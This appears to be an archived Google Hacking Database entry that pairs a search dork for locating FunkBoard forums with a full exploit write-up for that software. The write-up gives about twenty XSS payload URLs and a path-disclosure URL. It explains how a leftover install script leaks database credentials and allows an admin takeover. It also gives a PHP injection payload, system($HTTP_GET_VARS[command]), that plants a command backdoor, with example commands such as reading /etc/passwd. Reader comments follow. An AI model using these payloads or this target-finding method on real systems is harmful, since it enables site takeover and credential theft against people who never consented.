Hackers For Charity
BSides San Antonio
GHDB
GHDB
|
Google Search: “Powered by FunkBoard”
rgod rates this entry 10 out of 10. Submitted: 2005-08-08 00:00:00 Added by: rgod Hits: 5323 Score: 10 FunkBoard V0.66CF (possibly prior versions) cross site scripting, possible database username/password disclosure & board takeover, possible remote code execution software: author site: http://www.[path_to_funkboard].co.uk/ xss: http://[target]/[path_to_funkboard]/editpost.php?fbusername=”>alert(document.cookie) http://[target]/[path_to_funkboard]/editpost.php?fbpassword=”>alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbpassword=”>alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbusername=”>alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername=”>alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword=”>alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject=”>alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername=”>alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword=”>alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbusername=”>alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbpassword=”>alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fbusername=”>alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fmail=”>alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?www=”>alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?icq=”>alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?yim=”>alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?location=”>alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sex=”>alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?interebbies=”>alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sig=alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?aim=”>alert(document.cookie) path disclosure: http://[target]/[path_to_funkboard]/images/forums.php database username & password disclosure: during installation is not remembered to delete the mysql_install script and the installation do not delete it, usually: http://[target]/[path]/admin/mysql_install.php or http://[target]/[path]/admin/pg_install.php there, a user can see database clear text username & password … Then, the script let the user proceed to the next page, where he can reset funkboard administator username & password. Now the script faults, because some tables exist, etc. So user can go back and setting a new database name for installation, guessing among other installations on the server… Once Installation succeeded he can set new admin username e password then login at this page: http://[target]/[path]/[path_to_funkboard]/admin/index.php Now the user can edit templates and append some evil javascript code. remote code execution: look at this code in mysql_install.php : $infoout = ““; echo “Writing Config File “; unlink (“../info.php”); $outname=”../info.php”; $file = fopen($outname,”w+”); fputs($file, $infoout); fclose($file); clearly, you can inject php code, example: go to http://[target]/[path]/admin/mysql_install.php in email field (not checked) write: email@domain.com’; error_reporting(0); system($HTTP_GET_VARS[command]); echo ‘ press continue… now look at info.php, the config file in main directory, you have: so, you have a backdoor on target system… you can launch commands by this urls: http://localhost:30/funkboard/info.php?command=ls%20-la to list directories… http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd to see /etc/passwd file Comments: |
Does GHDB still updates for now?
The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.
Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???
The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!
Is any offline view-able resources is available of this product ?